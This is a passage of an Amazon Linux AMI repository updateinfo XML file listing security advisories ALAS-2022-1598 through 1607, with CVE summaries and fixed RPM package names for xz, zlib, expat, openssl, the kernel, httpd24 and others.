name="vim-enhanced" version="8.2.4877" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-8.2.4877-1.1.amzn1.i686.rpm</filename></package><package name="vim-minimal" version="8.2.4877" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-8.2.4877-1.1.amzn1.i686.rpm</filename></package><package name="vim-common" version="8.2.4877" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-8.2.4877-1.1.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1598</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1598: important priority package update for xz</title><issued date="2022-05-31 23:47:00" /><updated date="2022-06-09 18:57:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-1271:
An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271" title="" id="CVE-2022-1271" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xz-lzma-compat" version="5.2.2" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/xz-lzma-compat-5.2.2-1.14.amzn1.x86_64.rpm</filename></package><package name="xz-libs" version="5.2.2" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/xz-libs-5.2.2-1.14.amzn1.x86_64.rpm</filename></package><package name="xz-compat-libs" version="5.2.2" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/xz-compat-libs-5.2.2-1.14.amzn1.x86_64.rpm</filename></package><package name="xz" version="5.2.2" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/xz-5.2.2-1.14.amzn1.x86_64.rpm</filename></package><package name="xz-debuginfo" version="5.2.2" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/xz-debuginfo-5.2.2-1.14.amzn1.x86_64.rpm</filename></package><package name="xz-devel" version="5.2.2" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/xz-devel-5.2.2-1.14.amzn1.x86_64.rpm</filename></package><package name="xz-debuginfo" version="5.2.2" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/xz-debuginfo-5.2.2-1.14.amzn1.i686.rpm</filename></package><package name="xz-devel" version="5.2.2" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/xz-devel-5.2.2-1.14.amzn1.i686.rpm</filename></package><package name="xz" version="5.2.2" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/xz-5.2.2-1.14.amzn1.i686.rpm</filename></package><package name="xz-lzma-compat" version="5.2.2" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/xz-lzma-compat-5.2.2-1.14.amzn1.i686.rpm</filename></package><package name="xz-compat-libs" version="5.2.2" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/xz-compat-libs-5.2.2-1.14.amzn1.i686.rpm</filename></package><package name="xz-libs" version="5.2.2" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/xz-libs-5.2.2-1.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1600</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1600: medium priority package update for containerd</title><issued date="2022-06-06 19:52:00" /><updated date="2022-06-09 19:01:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-31030:
A bug was found in containerd's CRI implementation where programs inside a container can cause the containerd daemon to consume memory without bound during invocation of the ExecSync API. This can cause containerd to consume all available memory on the computer, denying service to other legitimate workloads. Kubernetes and crictl can both be configured to use containerd's CRI implementation; ExecSync may be used when running probes or when executing processes via an exec facility.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31030" title="" id="CVE-2022-31030" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="containerd-debuginfo" version="1.4.13" release="3.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-debuginfo-1.4.13-3.amzn1.x86_64.rpm</filename></package><package name="containerd-stress" version="1.4.13" release="3.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-stress-1.4.13-3.amzn1.x86_64.rpm</filename></package><package name="containerd" version="1.4.13" release="3.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-1.4.13-3.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1601</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1601: important priority package update for log4j-cve-2021-44228-hotpatch</title><issued date="2022-06-13 16:56:00" /><updated date="2022-07-08 12:43:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-33915:
Versions of the Amazon AWS Apache Log4j hotpatch package before log4j-cve-2021-44228-hotpatch-1.3.5 are affected by a race condition that could lead to a local privilege escalation. This Hotpatch package is not a replacement for updating to a log4j version that mitigates CVE-2021-44228 or CVE-2021-45046; it provides a temporary mitigation to CVE-2021-44228 by hotpatching the local Java virtual machines. To do so, it iterates through all running Java processes, performs several checks, and executes the Java virtual machine with the same permissions and capabilities as the running process to load the hotpatch. A local user could cause the hotpatch script to execute a binary with elevated privileges by running a custom java process that performs exec() of an SUID binary after the hotpatch has observed the process path and before it has observed its effective user ID.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-33915" title="" id="CVE-2022-33915" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="log4j-cve-2021-44228-hotpatch" version="1.3" release="5.amzn1" epoch="0" arch="noarch"><filename>Packages/log4j-cve-2021-44228-hotpatch-1.3-5.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1602</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1602: important priority package update for zlib</title><issued date="2022-06-30 23:38:00" /><updated date="2022-07-07 00:02:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-25032:
An out-of-bounds access flaw was found in zlib, which allows memory corruption when deflating (ex: when compressing) if the input has many distant matches. For some rare inputs with a large number of distant matches (crafted payloads), the buffer into which the compressed or deflated data is written can overwrite the distance symbol table which it overlays. This issue results in corrupted output due to invalid distances, which leads to out-of-bound access, corrupting the memory and potentially crashing the application.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032" title="" id="CVE-2018-25032" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="minizip" version="1.2.8" release="7.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/minizip-1.2.8-7.19.amzn1.x86_64.rpm</filename></package><package name="minizip-devel" version="1.2.8" release="7.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/minizip-devel-1.2.8-7.19.amzn1.x86_64.rpm</filename></package><package name="zlib" version="1.2.8" release="7.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/zlib-1.2.8-7.19.amzn1.x86_64.rpm</filename></package><package name="zlib-devel" version="1.2.8" release="7.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/zlib-devel-1.2.8-7.19.amzn1.x86_64.rpm</filename></package><package name="zlib-static" version="1.2.8" release="7.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/zlib-static-1.2.8-7.19.amzn1.x86_64.rpm</filename></package><package name="zlib-debuginfo" version="1.2.8" release="7.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/zlib-debuginfo-1.2.8-7.19.amzn1.x86_64.rpm</filename></package><package name="zlib-debuginfo" version="1.2.8" release="7.19.amzn1" epoch="0" arch="i686"><filename>Packages/zlib-debuginfo-1.2.8-7.19.amzn1.i686.rpm</filename></package><package name="zlib" version="1.2.8" release="7.19.amzn1" epoch="0" arch="i686"><filename>Packages/zlib-1.2.8-7.19.amzn1.i686.rpm</filename></package><package name="zlib-devel" version="1.2.8" release="7.19.amzn1" epoch="0" arch="i686"><filename>Packages/zlib-devel-1.2.8-7.19.amzn1.i686.rpm</filename></package><package name="minizip" version="1.2.8" release="7.19.amzn1" epoch="0" arch="i686"><filename>Packages/minizip-1.2.8-7.19.amzn1.i686.rpm</filename></package><package name="minizip-devel" version="1.2.8" release="7.19.amzn1" epoch="0" arch="i686"><filename>Packages/minizip-devel-1.2.8-7.19.amzn1.i686.rpm</filename></package><package name="zlib-static" version="1.2.8" release="7.19.amzn1" epoch="0" arch="i686"><filename>Packages/zlib-static-1.2.8-7.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1603</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1603: medium priority package update for expat</title><issued date="2022-06-30 23:38:00" /><updated date="2022-07-07 00:01:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-22827:
storeAtts in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.
CVE-2022-22826:
nextScaffoldPart in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.
CVE-2022-22825:
lookup in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.
CVE-2022-22824:
defineAttribute in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.
CVE-2022-22823:
build_model in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.
CVE-2022-22822:
addBinding in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.
CVE-2021-46143:
In doProlog in xmlparse.c in Expat (aka libexpat) before 2.4.3, an integer overflow exists for m_groupSize.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46143" title="" id="CVE-2021-46143" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22822" title="" id="CVE-2022-22822" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22823" title="" id="CVE-2022-22823" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22824" title="" id="CVE-2022-22824" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22825" title="" id="CVE-2022-22825" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22826" title="" id="CVE-2022-22826" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22827" title="" id="CVE-2022-22827" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="expat-devel" version="2.1.0" release="14.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-devel-2.1.0-14.31.amzn1.x86_64.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="14.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-debuginfo-2.1.0-14.31.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="14.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-2.1.0-14.31.amzn1.x86_64.rpm</filename></package><package name="expat-devel" version="2.1.0" release="14.31.amzn1" epoch="0" arch="i686"><filename>Packages/expat-devel-2.1.0-14.31.amzn1.i686.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="14.31.amzn1" epoch="0" arch="i686"><filename>Packages/expat-debuginfo-2.1.0-14.31.amzn1.i686.rpm</filename></package><package name="expat" version="2.1.0" release="14.31.amzn1" epoch="0" arch="i686"><filename>Packages/expat-2.1.0-14.31.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1604</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1604: important priority package update for kernel</title><issued date="2022-06-30 23:38:00" /><updated date="2025-03-13 20:58:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-49349:
In the Linux kernel, the following vulnerability has been resolved:
ext4: fix use-after-free in ext4_rename_dir_prepare
CVE-2022-32981:
An issue was discovered in the Linux kernel through 5.18.3 on powerpc 32-bit platforms. There is a buffer overflow in ptrace PEEKUSER and POKEUSER (aka PEEKUSR and POKEUSR) when accessing floating point registers.
CVE-2022-32296:
The Linux kernel before 5.17.9 allows TCP servers to identify clients by observing what source ports are used.
CVE-2022-32250:
net/netfilter/nf_tables_api.c in the Linux kernel through 5.18.1 allows a local user (able to create user/net namespaces) to escalate privileges to root because an incorrect NFT_STATEFUL_EXPR check leads to a use-after-free.
CVE-2022-1966:
A use-after-free vulnerability was found in the Linux kernel's Netfilter subsystem in net/netfilter/nf_tables_api.c. This flaw allows a local attacker with user access to cause a privilege escalation issue.
CVE-2022-1184:
A use-after-free flaw was found in fs/ext4/namei.c:dx_insert_block() in the Linux kernel's filesystem sub-component. This flaw allows a local attacker with a user privilege to cause a denial of service.
CVE-2022-1012:
Due to the small table perturb size, a memory leak flaw was found in the Linux kernel's TCP source port generation algorithm in the net/ipv4/tcp.c function. This flaw allows an attacker to leak information and may cause a denial of service.
CVE-2022-0812:
An information leak flaw was found in NFS over RDMA in the net/sunrpc/xprtrdma/rpc_rdma.c function in RPCRDMA_HDRLEN_MIN (7) (in rpcrdma_max_call_header_size, rpcrdma_max_reply_header_size). This flaw allows an attacker with normal user privileges to leak kernel information.
CVE-2022-0494:
A kernel information leak flaw was identified in the scsi_ioctl function in drivers/scsi/scsi_ioctl.c in the Linux kernel. This flaw allows a local attacker with a special user privilege (CAP_SYS_ADMIN or CAP_SYS_RAWIO) to create issues with confidentiality.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0494" title="" id="CVE-2022-0494" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0812" title="" id="CVE-2022-0812" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1012" title="" id="CVE-2022-1012" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1184" title="" id="CVE-2022-1184" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1966" title="" id="CVE-2022-1966" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32250" title="" id="CVE-2022-32250" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32296" title="" id="CVE-2022-32296" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32981" title="" id="CVE-2022-32981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-49349" title="" id="CVE-2022-49349" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.14.285" release="147.501.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.285-147.501.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.285" release="147.501.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.285-147.501.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.285" release="147.501.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.285-147.501.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.285" release="147.501.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.285-147.501.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.285" release="147.501.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.285-147.501.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.285" release="147.501.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.285-147.501.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.285" release="147.501.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.285-147.501.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.285" release="147.501.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.285-147.501.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.285" release="147.501.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.285-147.501.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.285" release="147.501.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.285-147.501.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.285" release="147.501.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.285-147.501.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.285" release="147.501.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.285-147.501.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.285" release="147.501.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.285-147.501.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.285" release="147.501.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.285-147.501.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.285" release="147.501.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.285-147.501.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.285" release="147.501.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.285-147.501.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.285" release="147.501.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.285-147.501.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.285" release="147.501.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.285-147.501.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.285" release="147.501.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.285-147.501.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.285" release="147.501.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.285-147.501.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1605</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1605: medium priority package update for openssl</title><issued date="2022-06-30 23:38:00" /><updated date="2022-07-06 23:59:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-1292:
The c_rehash script does not properly sanitise shell metacharacters to prevent command injection. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2). Fixed in OpenSSL 1.1.1o (Affected 1.1.1-1.1.1n). Fixed in OpenSSL 1.0.2ze (Affected 1.0.2-1.0.2zd).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292" title="" id="CVE-2022-1292" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl" version="1.0.2k" release="16.158.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-16.158.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.158.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-16.158.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.158.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-16.158.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.158.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-16.158.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.158.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-16.158.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.158.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-16.158.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.158.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-16.158.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.158.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-16.158.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.158.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-16.158.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.158.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-16.158.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1606</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1606: medium priority package update for microcode_ctl</title><issued date="2022-06-30 23:38:00" /><updated date="2024-05-09 17:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-21166:
A flaw was found in hw. Incomplete cleanup in specific special register write operations for some Intel&reg; Processors may allow an authenticated user to enable information disclosure via local access.
CVE-2022-21151:
A flaw was found in hw. Processor optimization removal or modification of security-critical code for some Intel(R) processors may potentially allow an authenticated user to enable information disclosure via local access.
CVE-2021-33117:
Improper access control for some 3rd Generation Intel(R) Xeon(R) Scalable Processors before BIOS version MR7, may allow a local attacker to potentially enable information disclosure via local access.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33117" title="" id="CVE-2021-33117" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21151" title="" id="CVE-2022-21151" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21166" title="" id="CVE-2022-21166" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="microcode_ctl" version="2.1" release="47.40.amzn1" epoch="2" arch="x86_64"><filename>Packages/microcode_ctl-2.1-47.40.amzn1.x86_64.rpm</filename></package><package name="microcode_ctl-debuginfo" version="2.1" release="47.40.amzn1" epoch="2" arch="x86_64"><filename>Packages/microcode_ctl-debuginfo-2.1-47.40.amzn1.x86_64.rpm</filename></package><package name="microcode_ctl" version="2.1" release="47.40.amzn1" epoch="2" arch="i686"><filename>Packages/microcode_ctl-2.1-47.40.amzn1.i686.rpm</filename></package><package name="microcode_ctl-debuginfo" version="2.1" release="47.40.amzn1" epoch="2" arch="i686"><filename>Packages/microcode_ctl-debuginfo-2.1-47.40.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1607</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1607: medium priority package update for httpd24</title><issued date="2022-06-30 23:38:00" /><updated date="2022-07-06 23:58:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-31813:
A flaw was found in the mod_proxy module of httpd. The server may remove the X-Forwarded-* headers from a request based on the client-side Connection header hop-by-hop mechanism.
CVE-2022-30556:
A flaw was found in the mod_lua module of httpd. The data returned by the wsread function may point past the end of the storage allocated for the buffer, resulting in information disclosure.
CVE-2022-30522:
A flaw was found in the mod_sed module of httpd. A very large input to the mod_sed module can result in a denial of service due to excessively large memory allocations.
CVE-2022-29404:
A flaw was found in the mod_lua module of httpd. A malicious request to a Lua script that calls parsebody(0) can lead to a denial of service due to no default limit on the possible input size.
CVE-2022-28615:
An out-of-bounds read vulnerability was found in httpd. A very large input to the ap_strcmp_match function can lead to an integer overflow and result in an out-of-bounds read.
CVE-2022-28614:
An out-of-bounds read vulnerability was found in httpd. A very large input to the ap_rputs and ap_rwrite functions can lead to an integer overflow and result in an out-of-bounds read.
CVE-2022-28330:
An out-of-bounds read vulnerability was found in the mod_isapi module of httpd. The issue occurs when httpd is configured to process requests with the mod_isapi module.
CVE-2022-26377:
An HTTP request smuggling vulnerability was found in the mod_proxy_ajp module of httpd. This flaw allows an attacker to smuggle requests to the AJP server, where it forwards requests.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26377" title="" id="CVE-2022-26377" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28330" title="" id="CVE-2022-28330" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28614" title="" id="CVE-2022-28614" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28615" title="" id="CVE-2022-28615" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29404" title="" id="CVE-2022-29404" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30522" title="" id="CVE-2022-30522" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30556" title="" id="CVE-2022-30556" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31813" title="" id="CVE-2022-31813" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd24-tools" version="2.4.54" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.54-1.98.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.54" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.54-1.98.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.54" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.54-1.98.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.54" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.54-1.98.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.54" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.54-1.98.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.54" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.54-1.98.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.54" release="1.98.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.54-1.98.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.54" release="1.98.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.54-1.98.amzn1.noarch.rpm</filename></package><package name="mod24_ssl" version="2.4.54" release="1.98.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.54-1.98.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.54" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.54-1.98.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.54" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.54-1.98.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.54" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.54-1.98.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.54" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.54-1.98.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.54" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.54-1.98.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.54" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.54-1.98.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.54" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.54-1.98.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.54" release="1.98.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.54-1.98.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.54" release="1.98.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.54-1.98.amzn1.i686.rpm</filename></package><package name="mod24_md" version="2.4.54" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.54-1.98.amzn1.i686.rpm</filename></package></collection></pkglist></update><update 